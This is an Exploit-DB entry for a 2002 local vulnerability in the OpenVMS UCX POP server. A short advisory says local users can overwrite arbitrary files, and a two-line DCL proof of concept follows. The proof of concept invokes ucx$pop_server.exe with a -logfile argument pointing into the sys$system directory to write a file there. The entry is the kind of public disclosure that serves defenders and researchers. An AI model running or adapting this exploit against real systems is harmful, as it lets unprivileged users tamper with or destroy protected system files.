OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification

EDB-ID:

21856


Author:

Mike Riley

Type:

local


Platform:

Multiple

Date:

2002-09-25


source: https://www.securityfocus.com/bid/5790/info

An issue with the UCX POP (Post Office Protocol) server used by OpenVMS has been reported. It is possible for a malicous local user to overwrite arbitrary files on the filesystem by exploiting a vulnerability in the UCX POP server.

$
$ break_it :== $sys$system:ucx$pop_server.exe
$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE